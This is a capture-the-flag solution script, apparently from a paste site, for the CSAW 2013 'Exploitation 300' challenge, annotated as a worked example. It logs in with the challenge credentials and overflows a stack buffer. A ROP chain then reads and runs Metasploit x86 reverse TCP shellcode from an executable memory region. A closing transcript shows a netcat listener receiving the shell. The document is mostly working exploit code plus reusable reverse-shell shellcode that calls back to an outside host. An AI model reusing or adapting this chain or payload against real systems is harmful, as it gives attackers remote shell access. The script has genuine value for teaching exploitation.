neonblue

csaw 2013 exploitation 300

Dec 2nd, 2013
# CSAW 2013 "Exploitation 300" solution script.  Python 2 code (`print`
# statement, `raw_input`, str literals carrying raw bytes); it will not run
# unchanged under Python 3.  Kept as a worked example of a classic chain:
# stack buffer overflow -> small ROP chain -> second-stage shellcode received
# into an executable region.  Every address and host below is specific to the
# challenge binary and the author's lab network.
from struct import pack, unpack
from socket import *
import time

# 32-bit little-endian (un)packers used to lay out the ROP chain.
p = lambda x : pack("<I", x)
up = lambda x : unpack("<I", x)[0]   # defined but never used in this script

# Lab target (private RFC 1918 address; the service's listening port).
HOST = "192.168.0.109"
PORT = 34266

# linux/x86/shell_reverse_tcp - 95 bytes
# http://www.metasploit.com
# Second stage.  It is sent over the same socket after the ROP chain and is
# received into `freespace` (see below).  The callback address/port are baked
# into these bytes and cannot be read from here; the transcript at the bottom
# shows the author's listener on port 12071.
shellcode = ("\xd9\xcf\xd9\x74\x24\xf4\x5d\x33\xc9\xb1\x12\xba\x5c\xa8"
             "\x72\xf6\x83\xed\xfc\x31\x55\x13\x03\x09\xbb\x90\x03\x80"
             "\x60\xa3\x0f\xb1\xd5\x1f\xba\x37\x53\x7e\x8a\x51\xae\x01"
             "\x78\xc4\x80\x3d\xb2\x76\xa9\x38\xb5\x1e\xf6\xce\xb2\x16"
             "\x6e\x33\x3d\x89\x48\xba\xdc\x65\xf0\xec\x4f\xd6\x4e\x0f"
             "\xf9\x39\x7d\x90\xab\xd1\x51\xbe\x38\x49\xc6\xef\xdc\xe0"
             "\x78\x79\xc3\xa0\xd7\xf0\xe5\xf4\xd3\xcf\x66")

# Hard-coded, target-specific addresses.  They are all fixed 0x0804xxxx
# values, i.e. a non-PIE binary with no ASLR on its text/data, and the
# author notes `freespace` is mapped rwx.  Those two properties are what
# make a fixed chain like this work; PIE/ASLR, a stack canary in front of
# the saved return address, or an NX (W^X) mapping at `freespace` would
# each break it -- they are the mitigations the challenge binary lacks.
freespace = 0x0804b000 # rwx -- writable AND executable: recv()'d bytes are run from here
recv = 0x08048890      # address that reaches recv(); presumably the PLT stub -- not verifiable from this page
pr = 0x08048943        # named like a "pop; ret" gadget; its role in the chain is explained at `payload`
offset = 0x41c         # distance from the overflowed buffer to saved ebp; the payload below repeats this literal rather than using `offset`

print "[*] CSAW Exploitation Level3 Exploit" # by sweetchip
s = socket(AF_INET,SOCK_STREAM)
s.connect((HOST,PORT))

# Walk the service's prompt sequence: two banner reads, a username, a
# password, then the value "-1".  What the service does with "-1" is not
# visible here; presumably it is the length/count answer that lets the next
# send overrun the stack buffer -- confirm against the binary.
print s.recv(4096)
print s.recv(4096)
s.send("csaw2013")

print s.recv(4096)
s.send("S1mplePWD")

print s.recv(4096)
s.send("-1")

print s.recv(4096)
time.sleep(1)   # presumably gives the server time to reach its read before the payload arrives; not reasoned about further here


# Stage one.  0x41c filler bytes reach the saved ebp and the extra 4 overwrite
# it; the following dword replaces the saved return address.  As laid out:
#   ret -> recv(4, freespace, len(shellcode), 0)   (fd 4 presumably the client socket)
#   recv() returns into `pr`; if `pr` is a single-pop gadget, as the layout
#   suggests, it discards the `4` and its `ret` lands on `freespace`, i.e. on
#   the bytes recv() has just written.
payload = "A"*(0x41c+4) # ebp
payload += p(recv)      # rop_start
payload += p(pr)        # return address for recv()
payload += p(4)         # arg 1: fd
payload += p(freespace) # arg 2: buf
payload += p(len(shellcode)) # arg 3: len
payload += p(0)         # arg 4: flags

s.send(payload)
s.send(shellcode)       # consumed by the recv() call in the chain above
raw_input("\ngive me shell! > ")

# Session transcript left by the author.  It is a bare string literal, so it
# is a no-op at runtime; it records the reverse shell calling back to a
# Windows host running netcat.
"""
C:\Users\Administrator>nc -lvp 12071
listening on [any] 12071 ...
192.168.0.1: inverse host lookup failed: h_errno 11004: NO_DATA
connect to [192.168.0.93] from (UNKNOWN) [192.168.0.1] 51765: NO_DATA
whoami
sweetchip
"""